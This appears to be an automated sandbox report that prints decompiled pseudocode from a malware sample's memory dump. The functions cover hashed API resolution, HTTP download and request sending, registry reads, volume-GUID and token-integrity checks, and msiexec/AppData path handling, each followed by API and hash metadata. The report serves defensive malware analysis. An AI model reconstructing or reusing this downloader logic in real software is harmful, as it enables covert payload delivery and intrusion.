                                                                				void* _t55;
                                                                				void* _t56;
                                                                				void* _t58;
                                                                
                                                                				_t24 = _a12;
                                                                				_t50 = _a16;
                                                                				_v24 = 0;
                                                                				_t48 =  <=  ? _t24 : 0xa00000;
                                                                				_t54 = 0;
                                                                				_v32 =  <=  ? _t24 : 0xa00000;
                                                                				_t63 = _t50;
                                                                				if(_t50 == 0) {
                                                                					while(1) {
                                                                						L2:
                                                                						_t6 = _t54 + 0x40000; // 0x40000
                                                                						_v20 = 0x40000;
                                                                						_t27 = E000EB220(_t64,  &_v24, _t6); // executed
                                                                						_t56 = _t55 + 8;
                                                                						_t65 = _t27;
                                                                						if(_t27 == 0) {
                                                                							break;
                                                                						}
                                                                						E000DBF50(_t65, 0x13, 0x7e90205);
                                                                						_t56 = _t56 + 8;
                                                                						_t42 = _v24;
                                                                						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
                                                                						if(_t31 == 0) {
                                                                							break;
                                                                						}
                                                                						_v28 = _t42;
                                                                						_t43 = _t50;
                                                                						_t51 = _v20;
                                                                						_t32 = E000D55C0(_v20, 0);
                                                                						_t58 = _t56 + 8;
                                                                						_t67 = _t32 & 0x00000001;
                                                                						if((_t32 & 0x00000001) != 0) {
                                                                							_t33 = _a8;
                                                                							__eflags = _t33;
                                                                							if(_t33 == 0) {
                                                                								E000DB570(_v28);
                                                                								return 1;
                                                                							}
                                                                							 *_t33 = _v28;
                                                                							 *((intOrPtr*)(_t33 + 4)) = _t54;
                                                                							return 1;
                                                                						}
                                                                						_t38 = E000D22E0(_t67, _t51 + _t54 + E000D9D50(0x6fb39a5e), 0xbc79af2);
                                                                						_t56 = _t58 + 0xc;
                                                                						if(_t38 > _v32) {
                                                                							break;
                                                                						}
                                                                						_t54 = _t38;
                                                                						_t50 = _t43;
                                                                						_t64 = _t50;
                                                                						if(_t50 != 0) {
                                                                							goto L1;
                                                                						}
                                                                					}
                                                                					L8:
                                                                					E000DB570(_v24);
                                                                					__eflags = 0;
                                                                					return 0;
                                                                				}
                                                                				L1:
                                                                				_t40 = E000DBF50(_t63, 0, E000D9D50(0x640dea48));
                                                                				_t56 = _t56 + 0xc;
                                                                				_t41 =  *_t40(_t50, 0);
                                                                				_t64 = _t41 - 0x102;
                                                                				if(_t41 != 0x102) {
                                                                					goto L8;
                                                                				}
                                                                				goto L2;
                                                                			}






















                                                                0x000d1af9
                                                                0x000d1afc
                                                                0x000d1b04
                                                                0x000d1b14
                                                                0x000d1b17
                                                                0x000d1b19
                                                                0x000d1b1c
                                                                0x000d1b1e
                                                                0x000d1b48
                                                                0x000d1b48
                                                                0x000d1b48
                                                                0x000d1b4e
                                                                0x000d1b5a
                                                                0x000d1b5f
                                                                0x000d1b62
                                                                0x000d1b64
                                                                0x00000000
                                                                0x00000000
                                                                0x000d1b6d
                                                                0x000d1b72
                                                                0x000d1b75
                                                                0x000d1b86
                                                                0x000d1b8a
                                                                0x00000000
                                                                0x00000000
                                                                0x000d1b8c
                                                                0x000d1b8f
                                                                0x000d1b91
                                                                0x000d1b97
                                                                0x000d1b9c
                                                                0x000d1b9f
                                                                0x000d1ba1
                                                                0x000d1bed
                                                                0x000d1bf0
                                                                0x000d1bf2
                                                                0x000d1c03
                                                                0x00000000
                                                                0x000d1c0b
                                                                0x000d1bf7
                                                                0x000d1bf9
                                                                0x00000000
                                                                0x000d1bfc
                                                                0x000d1bba
                                                                0x000d1bbf
                                                                0x000d1bc5
                                                                0x00000000
                                                                0x00000000
                                                                0x000d1bc7
                                                                0x000d1bc9
                                                                0x000d1bcb
                                                                0x000d1bcd
                                                                0x00000000
                                                                0x00000000
                                                                0x000d1bd3
                                                                0x000d1bd8
                                                                0x000d1bdb
                                                                0x000d1be3
                                                                0x00000000
                                                                0x000d1be3
                                                                0x000d1b20
                                                                0x000d1b30
                                                                0x000d1b35
                                                                0x000d1b3b
                                                                0x000d1b3d
                                                                0x000d1b42
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • InternetReadFile.WININET(?,?,00040000,00040000), ref: 000D1B86
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: FileInternetRead
                                                                • String ID:
                                                                • API String ID: 778332206-0
                                                                • Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
                                                                • Instruction ID: 421dcfed5b511f279f9669e861e3f9caa2c5b4e9f175af51e62b2d00034a07cf
                                                                • Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
                                                                • Instruction Fuzzy Hash: 8631A9B5D0030A6BDB10DA94EC42BFF77A5AF50315F154027F90567342FB71991587B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 97%
                                                                			E000DBA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
                                                                				int _v20;
                                                                				signed char _t22;
                                                                				long _t24;
                                                                				void* _t26;
                                                                				long _t29;
                                                                				signed char _t30;
                                                                				char* _t34;
                                                                				long _t36;
                                                                				char** _t47;
                                                                				int _t49;
                                                                				char* _t51;
                                                                				void* _t52;
                                                                				void* _t54;
                                                                				void* _t58;
                                                                				void* _t60;
                                                                
                                                                				_push(__eax);
                                                                				 *_a20 = 0;
                                                                				_t22 = E000E5000(_a20, _t60, 0xffffffff);
                                                                				E000DBF50(_t60, 9, 0xda29a27);
                                                                				_t54 = _t52 + 0xc;
                                                                				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
                                                                				_t49 = 0xffffffff;
                                                                				_t61 = _t24;
                                                                				if(_t24 == 0) {
                                                                					_t47 = _a20;
                                                                					_v20 = 0;
                                                                					_t26 = E000D9D50(0x647400a5);
                                                                					E000DBF50(_t61, _t26, E000D9D50(0x64f4976b));
                                                                					_t58 = _t54 + 0x10;
                                                                					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
                                                                					_t62 = _t29;
                                                                					if(_t29 == 0) {
                                                                						_t39 = _v20;
                                                                						_t30 = E000D55C0(_v20, 0);
                                                                						_t58 = _t58 + 8;
                                                                						_t49 = 0;
                                                                						__eflags = _t30 & 0x00000001;
                                                                						if(__eflags == 0) {
                                                                							E000D1460(__eflags, _t39, 4);
                                                                							_t34 = E000D8290(_t39 + 4);
                                                                							_t58 = _t58 + 0xc;
                                                                							__eflags = _t34;
                                                                							if(__eflags == 0) {
                                                                								goto L2;
                                                                							} else {
                                                                								_t51 = _t34;
                                                                								E000DBF50(__eflags, 9, 0x8097c7);
                                                                								_t58 = _t58 + 8;
                                                                								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
                                                                								__eflags = _t36;
                                                                								if(__eflags == 0) {
                                                                									 *_t47 = _t51;
                                                                									_t49 = _v20;
                                                                								} else {
                                                                									E000DB570(_t51);
                                                                									_t58 = _t58 + 4;
                                                                									goto L2;
                                                                								}
                                                                							}
                                                                						}
                                                                					} else {
                                                                						L2:
                                                                						_t49 = 0xffffffff;
                                                                					}
                                                                					E000DBF50(_t62, 9, 0x3111c69);
                                                                					_t54 = _t58 + 8;
                                                                					RegCloseKey(_a4); // executed
                                                                				}
                                                                				return _t49;
                                                                			}


















                                                                0x000dba66
                                                                0x000dba70
                                                                0x000dba78
                                                                0x000dba90
                                                                0x000dba95
                                                                0x000dbaa1
                                                                0x000dbaa3
                                                                0x000dbaa8
                                                                0x000dbaaa
                                                                0x000dbab0
                                                                0x000dbab3
                                                                0x000dbabf
                                                                0x000dbad8
                                                                0x000dbadd
                                                                0x000dbaf1
                                                                0x000dbaf3
                                                                0x000dbaf5
                                                                0x000dbafe
                                                                0x000dbb04
                                                                0x000dbb09
                                                                0x000dbb0c
                                                                0x000dbb0e
                                                                0x000dbb10
                                                                0x000dbb18
                                                                0x000dbb21
                                                                0x000dbb26
                                                                0x000dbb29
                                                                0x000dbb2b
                                                                0x00000000
                                                                0x000dbb2d
                                                                0x000dbb2d
                                                                0x000dbb36
                                                                0x000dbb3b
                                                                0x000dbb4e
                                                                0x000dbb50
                                                                0x000dbb52
                                                                0x000dbb5f
                                                                0x000dbb61
                                                                0x000dbb54
                                                                0x000dbb55
                                                                0x000dbb5a
                                                                0x00000000
                                                                0x000dbb5a
                                                                0x000dbb52
                                                                0x000dbb2b
                                                                0x000dbaf7
                                                                0x000dbaf7
                                                                0x000dbaf7
                                                                0x000dbaf7
                                                                0x000dbb6b
                                                                0x000dbb70
                                                                0x000dbb76
                                                                0x000dbb76
                                                                0x000dbb81

                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 000DBAA1
                                                                • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000DBAF1
                                                                • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000DBB4E
                                                                • RegCloseKey.KERNEL32(?), ref: 000DBB76
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen
                                                                • String ID:
                                                                • API String ID: 1586453840-0
                                                                • Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
                                                                • Instruction ID: 6518c5f46fa939d64d806c787253f9c2b581572346844d8467ec5ea2e062c49b
                                                                • Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
                                                                • Instruction Fuzzy Hash: D231B5B2900315BBEB109E64EC42FEE3758AF15764F0A0125FD18663D3F771AA1086F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 74%
                                                                			E000EBAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
                                                                				signed int _v20;
                                                                				char _v24;
                                                                				intOrPtr _v28;
                                                                				long _v32;
                                                                				char* _v36;
                                                                				char _v48;
                                                                				char _v54;
                                                                				char _v65;
                                                                				char _v97;
                                                                				char _v204;
                                                                				intOrPtr _t38;
                                                                				void* _t43;
                                                                				char* _t47;
                                                                				char* _t51;
                                                                				void* _t52;
                                                                				char* _t57;
                                                                				int _t58;
                                                                				intOrPtr* _t59;
                                                                				intOrPtr* _t61;
                                                                				signed char _t65;
                                                                				intOrPtr* _t68;
                                                                				void* _t72;
                                                                				intOrPtr* _t74;
                                                                				signed char _t82;
                                                                				signed int _t85;
                                                                				void* _t99;
                                                                				void* _t104;
                                                                				void* _t105;
                                                                				void* _t107;
                                                                				void* _t115;
                                                                				void* _t117;
                                                                				intOrPtr _t126;
                                                                
                                                                				_t125 = __eflags;
                                                                				_t38 = E000D3750(_t125, E000D20A0(__eflags, _a24, 0xfffffffb), _a24);
                                                                				_t126 = _t38;
                                                                				_v28 = _t38;
                                                                				E000EED80( &_v48, _t126, E000DD0A0( &_v54, "HHb?",  &_v54));
                                                                				_v36 = E000EFCF0( &_v48);
                                                                				_v32 = 0;
                                                                				_t43 = E000D9D50(0x647400bf);
                                                                				E000DBF50(_t126, _t43, E000D9D50(0x6f9f943d));
                                                                				_t47 = E000DD0A0( &_v65, 0xf04e6,  &_v65);
                                                                				_t90 =  ==  ? 0xf0779 : 0xf07f4;
                                                                				_t51 = E000DD0A0( &_v204,  ==  ? 0xf0779 : 0xf07f4,  &_v204);
                                                                				_t115 = _t107 + 0x38;
                                                                				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
                                                                				_t104 = 0;
                                                                				if(_t52 == 0) {
                                                                					L9:
                                                                					E000EEC50( &_v48, _t134);
                                                                					return _t104;
                                                                				}
                                                                				_t105 = _a16;
                                                                				_t129 = _v28;
                                                                				_t99 = _t52;
                                                                				if(_v28 != 0) {
                                                                					_v20 = 0;
                                                                					_v24 = 4;
                                                                					_t68 = E000DBF50(_t129, 0x13, 0x85dc001);
                                                                					_t115 = _t115 + 8;
                                                                					_push( &_v24);
                                                                					_push( &_v20);
                                                                					_push(0x1f);
                                                                					_push(_t99);
                                                                					if( *_t68() != 0) {
                                                                						_t85 = _v20 ^ 0x00013380 | E000D9D50(0x6475332c) & _v20;
                                                                						_t131 = _t85;
                                                                						_v20 = _t85;
                                                                						_t72 = E000D9D50(0x647400bf);
                                                                						_t74 = E000DBF50(_t85, _t72, E000D9D50(0x61c0d6ad));
                                                                						_t115 = _t115 + 0x14;
                                                                						 *_t74(_t99, 0x1f,  &_v20, 4);
                                                                					}
                                                                				}
                                                                				E000DBF50(_t131, 0x13, 0xb157a91);
                                                                				_t57 = E000DD0A0( &_v97, 0xf0880,  &_v97);
                                                                				_t117 = _t115 + 0x10;
                                                                				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
                                                                				_t132 = _t58;
                                                                				if(_t58 == 0) {
                                                                					L8:
                                                                					_t59 = E000DBF50(__eflags, 0x13, 0x714b685);
                                                                					 *_t59(_t99);
                                                                					_t104 = 0;
                                                                					__eflags = 0;
                                                                				} else {
                                                                					_v20 = 0;
                                                                					_v24 = 4;
                                                                					_t61 = E000DBF50(_t132, 0x13, 0x249c261);
                                                                					_t82 = E000D55C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
                                                                					_t65 = E000D5920( &_v24, _v20, E000D9D50(0x64740064));
                                                                					_t117 = _t117 + 0x1c;
                                                                					if((_t82 & _t65) != 0) {
                                                                						goto L8;
                                                                					}
                                                                					_t134 = _t65 & 0x00000001 ^ _t82;
                                                                					if((_t65 & 0x00000001 ^ _t82) != 0) {
                                                                						goto L8;
                                                                					}
                                                                					_t104 = _t99;
                                                                				}
                                                                			}



































                                                                0x000ebad0
                                                                0x000ebaec
                                                                0x000ebaf6
                                                                0x000ebaf8
                                                                0x000ebb1e
                                                                0x000ebb2a
                                                                0x000ebb2d
                                                                0x000ebb39
                                                                0x000ebb52
                                                                0x000ebb65
                                                                0x000ebb7e
                                                                0x000ebb89
                                                                0x000ebb8e
                                                                0x000ebba3
                                                                0x000ebba5
                                                                0x000ebba9
                                                                0x000ebce1
                                                                0x000ebce4
                                                                0x000ebcf5
                                                                0x000ebcf5
                                                                0x000ebbaf
                                                                0x000ebbb2
                                                                0x000ebbb6
                                                                0x000ebbb8
                                                                0x000ebbba
                                                                0x000ebbc1
                                                                0x000ebbcf
                                                                0x000ebbd4
                                                                0x000ebbdd
                                                                0x000ebbde
                                                                0x000ebbdf
                                                                0x000ebbe1
                                                                0x000ebbe6
                                                                0x000ebc00
                                                                0x000ebc00
                                                                0x000ebc02
                                                                0x000ebc0a
                                                                0x000ebc23
                                                                0x000ebc28
                                                                0x000ebc34
                                                                0x000ebc34
                                                                0x000ebbe6
                                                                0x000ebc3d
                                                                0x000ebc50
                                                                0x000ebc55
                                                                0x000ebc60
                                                                0x000ebc62
                                                                0x000ebc64
                                                                0x000ebccd
                                                                0x000ebcd4
                                                                0x000ebcdd
                                                                0x000ebcdf
                                                                0x000ebcdf
                                                                0x000ebc66
                                                                0x000ebc66
                                                                0x000ebc6d
                                                                0x000ebc7b
                                                                0x000ebca5
                                                                0x000ebcb7
                                                                0x000ebcbc
                                                                0x000ebcc1
                                                                0x00000000
                                                                0x00000000
                                                                0x000ebcc5
                                                                0x000ebcc7
                                                                0x00000000
                                                                0x00000000
                                                                0x000ebcc9
                                                                0x000ebcc9

                                                                APIs
                                                                • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000EBBA3
                                                                • HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000EBC60
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: HttpRequest$LibraryLoadOpenSend
                                                                • String ID: HHb?
                                                                • API String ID: 1801990682-3770701742
                                                                • Opcode ID: f005f89d04713aa49341c6776bf659746389fa511f8b370bb44902b4dd030027
                                                                • Instruction ID: 7ce160e26c0b6737dbe5739b7299b50c67773c0a8ed13b82984cdd999a0ea268
                                                                • Opcode Fuzzy Hash: f005f89d04713aa49341c6776bf659746389fa511f8b370bb44902b4dd030027
                                                                • Instruction Fuzzy Hash: A051A6B2D403196BEB10ABA0EC52FFF76689B50704F050135FE18B6347FB616A1587B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 58%
                                                                			E000E1E90(void* __eflags, intOrPtr _a4) {
                                                                				short _v440;
                                                                				char _v516;
                                                                				char _v536;
                                                                				char _v1056;
                                                                				intOrPtr* _t10;
                                                                				void* _t11;
                                                                				signed char _t12;
                                                                				intOrPtr* _t16;
                                                                				intOrPtr* _t18;
                                                                				void* _t19;
                                                                				intOrPtr* _t20;
                                                                				void* _t21;
                                                                				intOrPtr* _t23;
                                                                				intOrPtr* _t25;
                                                                				void* _t26;
                                                                				void* _t27;
                                                                				intOrPtr* _t29;
                                                                				char* _t32;
                                                                				char* _t33;
                                                                				void* _t36;
                                                                				void* _t38;
                                                                
                                                                				_t10 = E000DBF50(__eflags, 8, 0x3a5687);
                                                                				_t32 =  &_v1056;
                                                                				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
                                                                				_t12 = E000D55C0(_t11, 0);
                                                                				_t38 = _t36 + 0x10;
                                                                				_t48 = _t12 & 0x00000001;
                                                                				if((_t12 & 0x00000001) == 0) {
                                                                					L7:
                                                                					E000E8F20(_a4, E000D9D50(0x647400bc));
                                                                					__eflags = 0;
                                                                					return 0;
                                                                				}
                                                                				_t16 = E000DBF50(_t48, 3, 0x55e8477);
                                                                				 *_t16(_t32);
                                                                				_t18 = E000DBF50(_t48, 0, 0xfb8d9e7);
                                                                				_t38 = _t38 + 0x10;
                                                                				_t33 =  &_v536;
                                                                				0;
                                                                				while(1) {
                                                                					_t19 =  *_t18(_t32, _t33, 0x104); // executed
                                                                					_t49 = _t19;
                                                                					if(_t19 != 0) {
                                                                						break;
                                                                					}
                                                                					_t23 = E000DBF50(_t49, 3, 0xd0682f7);
                                                                					 *_t23(_t32);
                                                                					_t25 = E000DBF50(_t49, 3, 0x42c2f97);
                                                                					_t38 = _t38 + 0x10;
                                                                					_t26 =  *_t25(_t32);
                                                                					_t50 = _t26;
                                                                					if(_t26 == 0) {
                                                                						goto L7;
                                                                					}
                                                                					_t27 = E000D9D50(0x647400af);
                                                                					_t29 = E000DBF50(_t50, _t27, E000D9D50(0x612a84db));
                                                                					 *_t29(_t32);
                                                                					_t18 = E000DBF50(_t50, 0, E000D9D50(0x6bccd94b));
                                                                					_t38 = _t38 + 0x1c;
                                                                				}
                                                                				__eflags = _v516 - 0x7b;
                                                                				if(__eflags != 0) {
                                                                					goto L7;
                                                                				}
                                                                				_v440 = 0;
                                                                				_t20 = E000DBF50(__eflags, 0xc, 0xd513d37);
                                                                				_t38 = _t38 + 8;
                                                                				_t21 =  *_t20( &_v516, _a4);
                                                                				__eflags = _t21;
                                                                				if(_t21 == 0) {
                                                                					return 1;
                                                                				}
                                                                				goto L7;
                                                                			}
























                                                                0x000e1ea3
                                                                0x000e1eab
                                                                0x000e1eba
                                                                0x000e1ebf
                                                                0x000e1ec4
                                                                0x000e1ec7
                                                                0x000e1ec9
                                                                0x000e1faa
                                                                0x000e1fbb
                                                                0x000e1fc3
                                                                0x00000000
                                                                0x000e1fc3
                                                                0x000e1ed6
                                                                0x000e1edf
                                                                0x000e1ee8
                                                                0x000e1eed
                                                                0x000e1ef0
                                                                0x000e1efc
                                                                0x000e1f00
                                                                0x000e1f07
                                                                0x000e1f09
                                                                0x000e1f0b
                                                                0x00000000
                                                                0x00000000
                                                                0x000e1f14
                                                                0x000e1f1d
                                                                0x000e1f26
                                                                0x000e1f2b
                                                                0x000e1f2f
                                                                0x000e1f31
                                                                0x000e1f33
                                                                0x00000000
                                                                0x00000000
                                                                0x000e1f3a
                                                                0x000e1f53
                                                                0x000e1f5c
                                                                0x000e1f6e
                                                                0x000e1f73
                                                                0x000e1f73
                                                                0x000e1f78
                                                                0x000e1f80
                                                                0x00000000
                                                                0x00000000
                                                                0x000e1f88
                                                                0x000e1f98
                                                                0x000e1f9d
                                                                0x000e1fa4
                                                                0x000e1fa6
                                                                0x000e1fa8
                                                                0x00000000
                                                                0x000e1fd0
                                                                0x00000000

                                                                APIs
                                                                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000E1EBA
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000E1F07
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Volume$FolderLibraryLoadMountNamePathPoint
                                                                • String ID: {
                                                                • API String ID: 4030958988-366298937
                                                                • Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
                                                                • Instruction ID: a945d0d3d44f895f25ceb511d9fd24b6f39b890b776607c304308bd0f57312a9
                                                                • Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
                                                                • Instruction Fuzzy Hash: 452191B5E803497AF62032B1AC13FFA31589F6174AF060035FD0C7428BFAA5AB5844B3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E000DBCD0(void* __eflags) {
                                                                				void* _t3;
                                                                				void* _t4;
                                                                				void* _t6;
                                                                				intOrPtr* _t8;
                                                                				void* _t9;
                                                                				intOrPtr* _t10;
                                                                				signed int _t11;
                                                                
                                                                				_t3 = E000E9AC0(__eflags, 0xffffffff); // executed
                                                                				_t4 = E000D7DD0(0xa8);
                                                                				_t16 =  ==  ? 0x8026 : 0x801a;
                                                                				_t6 = E000D9D50(0x647400a4);
                                                                				_t8 = E000DBF50(_t3 - _t4, _t6, E000D9D50(0x644e562b));
                                                                				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
                                                                				if(_t9 == 0) {
                                                                					_t10 = E000DBF50(__eflags, 0, 0xfda8b77);
                                                                					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
                                                                					__eflags = _t11;
                                                                					_t2 = _t11 != 0;
                                                                					__eflags = _t2;
                                                                					return _t11 & 0xffffff00 | _t2;
                                                                				}
                                                                				return 0;
                                                                			}










                                                                0x000dbcd8
                                                                0x000dbce7
                                                                0x000dbcfb
                                                                0x000dbd03
                                                                0x000dbd1c
                                                                0x000dbd30
                                                                0x000dbd34
                                                                0x000dbd41
                                                                0x000dbd55
                                                                0x000dbd57
                                                                0x000dbd59
                                                                0x000dbd59
                                                                0x00000000
                                                                0x000dbd59
                                                                0x00000000

                                                                APIs
                                                                • SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 000DBD30
                                                                Strings
                                                                • C:\Windows\SysWOW64\msiexec.exe, xrefs: 000DBD4E
                                                                • C:\Users\user\AppData\Roaming, xrefs: 000DBD24
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: FolderPath
                                                                • String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
                                                                • API String ID: 1514166925-2433609249
                                                                • Opcode ID: 7760b575ce8ef3dc84fbca9579e388013d3f2c19d46d29a7c8dfba90c1e50d74
                                                                • Instruction ID: e49d50b07f31a5bc1f112e45e056538dede096ee74bab57d729bab4833e28773
                                                                • Opcode Fuzzy Hash: 7760b575ce8ef3dc84fbca9579e388013d3f2c19d46d29a7c8dfba90c1e50d74
                                                                • Instruction Fuzzy Hash: E6F0AF96B8030537F66021B52C03FBA31898BA1B69F1A0131FA0CA93C3F881A91442B3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 83%
                                                                			E000E8590(void* __eflags, intOrPtr _a4) {
                                                                				void* _v20;
                                                                				long _v24;
                                                                				intOrPtr _v28;
                                                                				void* _t16;
                                                                				intOrPtr* _t18;
                                                                				void* _t19;
                                                                				union _TOKEN_INFORMATION_CLASS _t22;
                                                                				int _t23;
                                                                				signed char _t24;
                                                                				signed char _t30;
                                                                				void* _t31;
                                                                				int _t33;
                                                                				intOrPtr* _t35;
                                                                				signed char* _t36;
                                                                				void* _t40;
                                                                				intOrPtr* _t41;
                                                                				DWORD* _t42;
                                                                				signed char* _t43;
                                                                				void* _t47;
                                                                				intOrPtr _t49;
                                                                				void* _t51;
                                                                				void* _t54;
                                                                				void* _t57;
                                                                				void* _t61;
                                                                				void* _t63;
                                                                
                                                                				_t63 = __eflags;
                                                                				_v20 = 0;
                                                                				_t16 = E000D9D50(0x647400a5);
                                                                				_t18 = E000DBF50(_t63, _t16, E000D9D50(0x6b5f7e12));
                                                                				_t54 = _t51 + 0x10;
                                                                				_t19 =  *_t18(_a4, 8,  &_v20);
                                                                				_t64 = _t19;
                                                                				if(_t19 == 0) {
                                                                					_t49 = 0xffffffff;
                                                                					L12:
                                                                					return _t49;
                                                                				}
                                                                				E000DBF50(_t64, 9, 0xbd557e);
                                                                				_t22 = E000D9D50(0x647400b5);
                                                                				_t42 =  &_v24;
                                                                				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
                                                                				_t24 = E000D55C0(_t23, 0);
                                                                				_t57 = _t54 + 0x14;
                                                                				_t49 = 0xffffffff;
                                                                				_t65 = _t24 & 0x00000001;
                                                                				if((_t24 & 0x00000001) == 0) {
                                                                					L10:
                                                                					E000DBF50(_t71, 0, 0xb8e7db5);
                                                                					CloseHandle(_v20); // executed
                                                                					goto L12;
                                                                				}
                                                                				_t30 = E000D55C0( *((intOrPtr*)(E000DBF50(_t65, 0, E000D9D50(0x68042b4e))))(), 0x7a);
                                                                				_t57 = _t57 + 0x14;
                                                                				if((_t30 & 0x00000001) == 0) {
                                                                					goto L10;
                                                                				}
                                                                				_t31 = E000D8290(_v24);
                                                                				_t57 = _t57 + 4;
                                                                				_t67 = _t31;
                                                                				if(_t31 != 0) {
                                                                					_t47 = _t31;
                                                                					E000DBF50(_t67, 9, 0xbd557e);
                                                                					_t61 = _t57 + 8;
                                                                					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
                                                                					_t49 = 0xffffffff;
                                                                					_t68 = _t33;
                                                                					if(_t33 != 0) {
                                                                						_t35 = E000DBF50(_t68, 9, 0x8847844);
                                                                						_t61 = _t61 + 8;
                                                                						_t36 =  *_t35( *_t47);
                                                                						if(_t36 != 0) {
                                                                							_t70 =  *_t36;
                                                                							_t43 = _t36;
                                                                							if( *_t36 != 0) {
                                                                								_v28 = E000DBF50(_t70, 9, 0x7a1c189);
                                                                								_t40 = E000D22E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
                                                                								_t61 = _t61 + 0x10;
                                                                								_t41 = _v28( *_t47, _t40);
                                                                								_t71 = _t41;
                                                                								if(_t41 != 0) {
                                                                									_t49 =  *_t41;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					E000DB570(_t47);
                                                                					_t57 = _t61 + 4;
                                                                				}
                                                                			}




























                                                                0x000e8590
                                                                0x000e859c
                                                                0x000e85a8
                                                                0x000e85c1
                                                                0x000e85c6
                                                                0x000e85d0
                                                                0x000e85d2
                                                                0x000e85d4
                                                                0x000e86f6
                                                                0x000e86fb
                                                                0x000e8704
                                                                0x000e8704
                                                                0x000e85e1
                                                                0x000e85f3
                                                                0x000e85fb
                                                                0x000e8605
                                                                0x000e860a
                                                                0x000e860f
                                                                0x000e8612
                                                                0x000e8617
                                                                0x000e8619
                                                                0x000e86e0
                                                                0x000e86e7
                                                                0x000e86f2
                                                                0x00000000
                                                                0x000e86f2
                                                                0x000e863c
                                                                0x000e8641
                                                                0x000e8646
                                                                0x00000000
                                                                0x00000000
                                                                0x000e864f
                                                                0x000e8654
                                                                0x000e8657
                                                                0x000e8659
                                                                0x000e865f
                                                                0x000e8668
                                                                0x000e866d
                                                                0x000e867a
                                                                0x000e867c
                                                                0x000e8681
                                                                0x000e8683
                                                                0x000e868c
                                                                0x000e8691
                                                                0x000e8696
                                                                0x000e869a
                                                                0x000e869c
                                                                0x000e869f
                                                                0x000e86a1
                                                                0x000e86b2
                                                                0x000e86c3
                                                                0x000e86c8
                                                                0x000e86ce
                                                                0x000e86d1
                                                                0x000e86d3
                                                                0x000e86d5
                                                                0x000e86d5
                                                                0x000e86d3
                                                                0x000e86a1
                                                                0x000e869a
                                                                0x000e86d8
                                                                0x000e86dd
                                                                0x000e86dd

                                                                APIs
                                                                • GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000E8605
                                                                • CloseHandle.KERNEL32(00000000), ref: 000E86F2
